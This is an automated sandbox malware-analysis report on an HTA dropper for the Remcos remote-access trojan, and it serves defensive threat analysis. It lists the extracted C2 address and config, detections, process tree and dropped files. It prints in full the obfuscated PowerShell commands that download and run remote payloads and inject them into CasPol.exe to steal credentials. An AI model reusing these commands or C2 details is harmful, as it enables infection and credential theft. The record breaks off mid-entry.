remcos | 23650e26608f6c5c065c8989912b168ec6fba89e759a1a7f3edbe27345e21e4b

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
07-02-2025 04:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

23650e26608f6c5c065c8989912b168ec6fba89e759a1a7f3edbe27345e21e4b.hta
Size

15KB
MD5

b17075441c09b68399252230d95973af
SHA1

c4951ff30e5c1d76da15be8d097bb9c9b8514235
SHA256

23650e26608f6c5c065c8989912b168ec6fba89e759a1a7f3edbe27345e21e4b
SHA512

32e325fd879b2c00ede3a2c09348744bfc124b1984640e96ffcaf311b1fd60e63495fd6bf928bfa91cc0216400dedda383891804571667a42314c82efcd7ea9f
SSDEEP

48:3PCUlAEW2JlWjEW2wkkjr0AdbSdx399DdNRAAr5yK4/5hyKQlFlUEW28luG:/CU2EJsEhQpKJfrRHr5ylhyXz6E8n

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

216.9.226.100:3898

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
mic
mouse_option
false
mutex
Rmc-Q9T2QD
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/4036-108-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/3308-110-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/4964-109-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/4036-108-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/3308-110-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
28	868	powershell.exe
32	1988	powershell.exe
34	1988	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
868	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	CasPol.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1988	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1988 set thread context of 3560	1988	powershell.exe	108
PID 3560 set thread context of 3308	3560	CasPol.exe	111
PID 3560 set thread context of 4036	3560	CasPol.exe	112
PID 3560 set thread context of 4964	3560	CasPol.exe	113

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
868	powershell.exe
868	powershell.exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
1988	powershell.exe
4964	CasPol.exe
4964	CasPol.exe
3308	CasPol.exe
3308	CasPol.exe
3308	CasPol.exe
3308	CasPol.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
3560	CasPol.exe
3560	CasPol.exe
3560	CasPol.exe
3560	CasPol.exe
3560	CasPol.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	4964	CasPol.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3560	CasPol.exe

Suspicious use of WriteProcessMemory 58 IoCs

description	pid	Process	procid_target
PID 4468 wrote to memory of 4336	4468	mshta.exe	87
PID 4468 wrote to memory of 4336	4468	mshta.exe	87
PID 4468 wrote to memory of 4336	4468	mshta.exe	87
PID 4336 wrote to memory of 868	4336	cmd.exe	89
PID 4336 wrote to memory of 868	4336	cmd.exe	89
PID 4336 wrote to memory of 868	4336	cmd.exe	89
PID 868 wrote to memory of 4084	868	powershell.exe	94
PID 868 wrote to memory of 4084	868	powershell.exe	94
PID 868 wrote to memory of 4084	868	powershell.exe	94
PID 4084 wrote to memory of 4604	4084	csc.exe	95
PID 4084 wrote to memory of 4604	4084	csc.exe	95
PID 4084 wrote to memory of 4604	4084	csc.exe	95
PID 868 wrote to memory of 916	868	powershell.exe	100
PID 868 wrote to memory of 916	868	powershell.exe	100
PID 868 wrote to memory of 916	868	powershell.exe	100
PID 916 wrote to memory of 1988	916	WScript.exe	101
PID 916 wrote to memory of 1988	916	WScript.exe	101
PID 916 wrote to memory of 1988	916	WScript.exe	101
PID 1988 wrote to memory of 1144	1988	powershell.exe	104
PID 1988 wrote to memory of 1144	1988	powershell.exe	104
PID 1988 wrote to memory of 1144	1988	powershell.exe	104
PID 1988 wrote to memory of 4076	1988	powershell.exe	105
PID 1988 wrote to memory of 4076	1988	powershell.exe	105
PID 1988 wrote to memory of 4076	1988	powershell.exe	105
PID 1988 wrote to memory of 2332	1988	powershell.exe	106
PID 1988 wrote to memory of 2332	1988	powershell.exe	106
PID 1988 wrote to memory of 2332	1988	powershell.exe	106
PID 1988 wrote to memory of 5052	1988	powershell.exe	107
PID 1988 wrote to memory of 5052	1988	powershell.exe	107
PID 1988 wrote to memory of 5052	1988	powershell.exe	107
PID 1988 wrote to memory of 3560	1988	powershell.exe	108
PID 1988 wrote to memory of 3560	1988	powershell.exe	108
PID 1988 wrote to memory of 3560	1988	powershell.exe	108
PID 1988 wrote to memory of 3560	1988	powershell.exe	108
PID 1988 wrote to memory of 3560	1988	powershell.exe	108
PID 1988 wrote to memory of 3560	1988	powershell.exe	108
PID 1988 wrote to memory of 3560	1988	powershell.exe	108
PID 1988 wrote to memory of 3560	1988	powershell.exe	108
PID 1988 wrote to memory of 3560	1988	powershell.exe	108
PID 1988 wrote to memory of 3560	1988	powershell.exe	108
PID 3560 wrote to memory of 2400	3560	CasPol.exe	109
PID 3560 wrote to memory of 2400	3560	CasPol.exe	109
PID 3560 wrote to memory of 2400	3560	CasPol.exe	109
PID 3560 wrote to memory of 4884	3560	CasPol.exe	110
PID 3560 wrote to memory of 4884	3560	CasPol.exe	110
PID 3560 wrote to memory of 4884	3560	CasPol.exe	110
PID 3560 wrote to memory of 3308	3560	CasPol.exe	111
PID 3560 wrote to memory of 3308	3560	CasPol.exe	111
PID 3560 wrote to memory of 3308	3560	CasPol.exe	111
PID 3560 wrote to memory of 3308	3560	CasPol.exe	111
PID 3560 wrote to memory of 4036	3560	CasPol.exe	112
PID 3560 wrote to memory of 4036	3560	CasPol.exe	112
PID 3560 wrote to memory of 4036	3560	CasPol.exe	112
PID 3560 wrote to memory of 4036	3560	CasPol.exe	112
PID 3560 wrote to memory of 4964	3560	CasPol.exe	113
PID 3560 wrote to memory of 4964	3560	CasPol.exe	113
PID 3560 wrote to memory of 4964	3560	CasPol.exe	113
PID 3560 wrote to memory of 4964	3560	CasPol.exe	113

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\23650e26608f6c5c065c8989912b168ec6fba89e759a1a7f3edbe27345e21e4b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4468
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/C pOwErsHell -eX BYPASs -NoP -W 1 -C deViCecreDENtialdEployMeNT.EXE ; IeX($(IEX('[SYStem.texT.eNcoDiNg]'+[char]58+[cHAr]0X3A+'uTF8.geTsTRIng([sYsTEM.COnvERT]'+[CHAr]0X3A+[Char]0x3A+'fromBAse64STring('+[chAR]34+'JG0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYkVSREVmaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFiWmhCY1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUp0LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByUXJMSEwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUNDKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZU1BWm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG06OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMTcuMTYwLjE2My4xMTMvNDUzL3NlZXRoZWJld3R0aGluZ3N0b2RvdGhlYmVzdHdheW9mZ3JlYXRuZXNzZ29kLmdJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXd0dGhpbmdzdG9kb3RoZWJlc3R3YXlvZmdyZWF0bmVzc2dvYmVzdC52YnMiLDAsMCk7c3RhUnQtc2xlZXAoMyk7aU5Wb2tFLWlUZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHNlZXRoZWJld3R0aGluZ3N0b2RvdGhlYmVzdHdheW9mZ3JlYXRuZXNzZ29iZXN0LnZicyI='+[char]0X22+'))')))"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4336
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    pOwErsHell -eX BYPASs -NoP -W 1 -C deViCecreDENtialdEployMeNT.EXE ; IeX($(IEX('[SYStem.texT.eNcoDiNg]'+[char]58+[cHAr]0X3A+'uTF8.geTsTRIng([sYsTEM.COnvERT]'+[CHAr]0X3A+[Char]0x3A+'fromBAse64STring('+[chAR]34+'JG0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5cEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYkVSREVmaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFiWmhCY1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUp0LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByUXJMSEwsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQUNDKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZU1BWm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG06OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMTcuMTYwLjE2My4xMTMvNDUzL3NlZXRoZWJld3R0aGluZ3N0b2RvdGhlYmVzdHdheW9mZ3JlYXRuZXNzZ29kLmdJRiIsIiRlTnY6QVBQREFUQVxzZWV0aGViZXd0dGhpbmdzdG9kb3RoZWJlc3R3YXlvZmdyZWF0bmVzc2dvYmVzdC52YnMiLDAsMCk7c3RhUnQtc2xlZXAoMyk7aU5Wb2tFLWlUZW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXHNlZXRoZWJld3R0aGluZ3N0b2RvdGhlYmVzdHdheW9mZ3JlYXRuZXNzZ29iZXN0LnZicyI='+[char]0X22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:868
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fnwlx4ja\fnwlx4ja.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4084
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB44C.tmp" "c:\Users\Admin\AppData\Local\Temp\fnwlx4ja\CSCFBBBA68CDDBD4F0A812B1A765651E1B.TMP"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4604
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebewtthingstodothebestwayofgreatnessgobest.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:916
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZABvAGcAcwBzAGUAbgB0AGEAZQByAGcAZgBvAHkAYQB3AHQAcwBlAGIAZQBoAHQAbwBkAG8AdABzAGcAbgBpAGgAdAB0AHcAZQBiAGUAaAB0AGUAZQBzAC8AMwA1ADQALwAzADEAMQAuADMANgAxAC4AMAA2ADEALgA3ADEAMgAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAZwBvAGgAdQA3AHMAbAB4AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAOAAwADYANgA5ADMALwBsADgAbABtAG8AMgA2AG8ANwByAGYAOABvAHkAZwByADEAMAB5ADkALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAEMAYQBzAFAAbwBsACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1988
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:1144
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:4076
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:2332
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        
        PID:5052
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3560
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\fwnfdtlqzqpzoxkmadsqigsvsmlxqjccxf"
        7⤵
        
        PID:2400
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\fwnfdtlqzqpzoxkmadsqigsvsmlxqjccxf"
        7⤵
        
        PID:4884
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\fwnfdtlqzqpzoxkmadsqigsvsmlxqjccxf"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3308
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\hysqelw"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:4036
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\rsxifepljg"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mic\logs.dat

Filesize
102B

MD5
369245e24824cea2e5bcfb02bcfb187a

SHA1
d237350a31e97f9d5287e9f9ad1159929830dfb3

SHA256
0def116700264ea0a2812acb658e538a496eddc350d2ee911d653de15ab21bb6

SHA512
782e731c4cf4262b48dd1a6ea09f0425ff41ad461e5e0312d69152b29ee043ffce897f8cfcd54f1b609b8d0c8aedfe8d66bb441f51ebc5664cca8c4e041574c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9faf6f9cd1992cdebfd8e34b48ea9330

SHA1
ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e

SHA256
0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953

SHA512
05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
19KB

MD5
67cda4fb377daa683f9bde510401592f

SHA1
78896e683fddfcd04ef2a8ae2f635c61fc5a291b

SHA256
51aed5a22675207843e8b077d1f00d96075be0adf14f9bd76fc24f4bd50777f8

SHA512
b9312fcdb06cfcc85899d88158ed445352894779acae970b963e58536bf7808f306a9ad33230ef191f7adb88e6af10ea31f11a3e7a173641ee51c0b0437fc8bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB44C.tmp

Filesize
1KB

MD5
5c21108e2c583322f2a940c9e5d1940e

SHA1
02b338a38321a09edfaa39bb1bdcad3c028bf544

SHA256
e7b998652bcb78ee12d677c3ac21c717060730efb82109acdd3479ca60fabbbe

SHA512
5e73750bdc4b7bce73a5f95aabe97373e96b46860640f0cc6af28db930e26ee95b94029655e6b4207c42444bb1832104d362d4de7dc9160a7e5725007a7f0752

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_52ar2xgr.jyj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fnwlx4ja\fnwlx4ja.dll

Filesize
3KB

MD5
95ab02794f580558d08039c0ae53071a

SHA1
794dc7d6c1fce58d0ebc4def966232a76c448ea0

SHA256
b076ef6b6dd7880c8a5d84252d7f3b24a75212351617d24ff1693c765a853c45

SHA512
2434ac27b28ea9100f3a9a7e0396b161235b6e509fb03dc5a271d5cc306d94d0e777fb03b61fb598feed4607c1354bf70adfc16c60d98b15cb7a3c42a5eb8d6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\fwnfdtlqzqpzoxkmadsqigsvsmlxqjccxf

Filesize
4KB

MD5
2fbd443c784ba69b877ad51b7f90c781

SHA1
72b348683771b4d8d26320877dae610a1cdaa2a4

SHA256
b1fc6c37cc1b8a4e1cd1b485a2ca068f6d7bad07baa25b3f81b515874c11ea28

SHA512
08e1aa983a9d29f1839a1a9e85fb1bff572ddadbfa37e733f84f9391a2aa6acb94262ee264b7ecd3a9c80099c0e3d0e614410df002518d886fe3e056b7ec0cac

Download Submit
C:\Users\Admin\AppData\Roaming\seethebewtthingstodothebestwayofgreatnessgobest.vbs

Filesize
184KB

MD5
8cbb8e8c083138f50289f5722b80d0ec

SHA1
2e9d338f32146e76db9172c61cd95015de939983

SHA256
e574c7c03391b4142af0cfc89a23dc50eeb0573ec4922c6e3b3a032d0cd7a19e

SHA512
